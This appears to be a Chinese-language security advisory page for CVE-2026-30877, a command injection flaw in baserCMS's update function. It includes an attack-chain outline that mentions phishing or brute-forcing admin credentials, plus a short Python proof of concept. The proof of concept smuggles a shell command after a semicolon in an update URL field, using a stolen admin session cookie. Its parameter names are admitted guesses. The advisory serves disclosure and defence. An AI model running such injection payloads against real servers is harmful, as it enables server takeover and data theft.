CVE-2026-30877 CVSS 9.1 严重

CVE-2026-30877 baserCMS OS命令注入漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30877

漏洞类型

OS命令注入

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

baserCMS

漏洞概述

baserCMS是一个开源的网站开发框架，其在5.2.3版本之前的更新功能模块中存在严重的OS命令注入漏洞。由于系统未能正确处理用户提供的输入，拥有管理员权限的经过身份验证的攻击者可以利用此缺陷，在运行baserCMS的服务器上执行任意操作系统命令。成功利用该漏洞可能导致攻击者完全控制服务器，造成敏感数据泄露或系统瘫痪。官方已在5.2.3版本中修复此问题。

技术细节

该漏洞的根本原因在于baserCMS更新功能中的输入验证机制存在缺陷。当管理员执行系统更新操作时，应用程序会将用户提供的某些参数（如更新地址或相关配置）直接拼接或传递给底层的系统命令执行接口（如PHP的exec、system等函数）。由于缺乏对特殊字符（如分号、管道符）的过滤或转义，攻击者可以构造恶意的Payload，使得原本的执行逻辑被篡改，进而拼接并执行攻击者指定的任意操作系统命令。鉴于该漏洞需要管理员权限才能触发，这通常是内网提权或攻陷后台后的进一步攻击手段，危害极高。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标网站使用的是baserCMS，并确认版本低于5.2.3。

STEP 2

2. 获取凭证

通过钓鱼、暴力破解或其他手段获取baserCMS管理员账户的用户名和密码。

STEP 3

3. 认证与会话建立

攻击者使用获取的管理员凭证登录后台，建立有效的会话。

STEP 4

4. 漏洞利用

攻击者访问存在漏洞的更新功能页面，并在输入字段中注入恶意OS命令（通过分号等拼接符）。

STEP 5

5. 命令执行

服务器端未经过滤处理恶意输入，直接执行系统命令，攻击者获取服务器控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example)
target_url = "http://vulnerable-site/admin/tools/update"

# Attacker Cookie (Admin privileges required)
cookies = {
    "PHPSESSID": "stolen_admin_session_id"
}

# Malicious payload injecting a shell command (e.g., `whoami`)
# The specific parameter depends on the vulnerable field in the update function
payload_data = {
    "update_url": "http://valid-update-url.com; whoami",
    "exec_update": "1"
}

try:
    print("[+] Sending malicious request to trigger OS command injection...")
    response = requests.post(target_url, data=payload_data, cookies=cookies, timeout=10)
    
    if response.status_code == 200:
        print("[+] Request sent successfully. Check server response for command output.")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

baserCMS < 5.2.3

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用系统的更新功能模块，并严格监控服务器的系统进程和网络连接。检查Web服务器日志，查找针对更新接口的可疑请求。此外，应确保运行baserCMS的服务器账户仅具有必要的最小系统权限，以减少命令注入后的潜在破坏力。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表